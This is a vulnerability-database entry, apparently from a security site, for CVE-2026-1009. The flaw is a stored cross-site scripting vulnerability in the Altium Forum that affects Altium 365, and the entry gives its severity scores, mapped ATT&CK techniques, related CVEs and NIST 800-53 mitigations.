Cyber Resilience

CVE-2026-1009

Critical

Published: 15 January 2026

Published
15 January 2026
Modified
23 January 2026
KEV Added
Patch
CVSS Score v3.1 9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
EPSS Score 0.0021 11.5th percentile
Risk Priority 70 floored blend · peak EPSS

Summary

CVE-2026-1009 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Altium Altium Live. Its CVSS base score is 9.0 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 11.5th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-1009 is a stored cross-site scripting (XSS) vulnerability in the Altium Forum, caused by missing server-side input sanitization of forum post content. It affects Altium 365, where authenticated users can post content that leads to arbitrary JavaScript injection. The issue is associated with CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-284 (Improper Access Control), earning a CVSS v3.1 base score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).

An authenticated attacker with forum posting privileges can exploit this by injecting malicious JavaScript into a post, which is then stored on the server. When other authenticated Altium 365 users view the affected post, the payload executes in the context of their browser session, granting the attacker unauthorized access to the victim's workspace data, including design files and settings. Successful exploitation requires user interaction, as victims must view the malicious post.

Altium has published a security advisory with further details on this vulnerability, available at https://www.altium.com/platform/security-compliance/security-advisories.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

A stored cross-site scripting (XSS) vulnerability exists in the Altium Forum due to missing server-side input sanitization in forum post content. An authenticated attacker can inject arbitrary JavaScript into forum posts, which is stored and executed when other users view…

more

the affected post. Successful exploitation allows the attacker’s payload to execute in the context of the victim’s authenticated Altium 365 session, enabling unauthorized access to workspace data, including design files and workspace settings. Exploitation requires user interaction to view a malicious forum post.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1185 Browser Session Hijacking Collection
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
T1539 Steal Web Session Cookie Credential Access
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

Stored XSS enables arbitrary JS execution in victim browser sessions, directly facilitating session hijacking and cookie theft for unauthorized data access.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-1008Same product: Altium Altium Live
CVE-2025-27380Same vendor: Altium
CVE-2025-24885Shared CWE-284, CWE-79
CVE-2026-1010Same vendor: Altium
CVE-2026-34561Shared CWE-79
CVE-2025-25102Shared CWE-79
CVE-2026-32277Shared CWE-79
CVE-2025-23429Shared CWE-79
CVE-2025-26918Shared CWE-79
CVE-2026-46367Shared CWE-79

Affected Assets

altium
altium live
1.2.2

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly mandates server-side validation and sanitization of forum post content to block injection of arbitrary JavaScript payloads.

prevent

Requires filtering and encoding of stored forum post content during output to prevent execution of XSS payloads in victims' browsers.

prevent

Enforces restrictions on forum post inputs to limit content types and prevent processing of malicious JavaScript.

References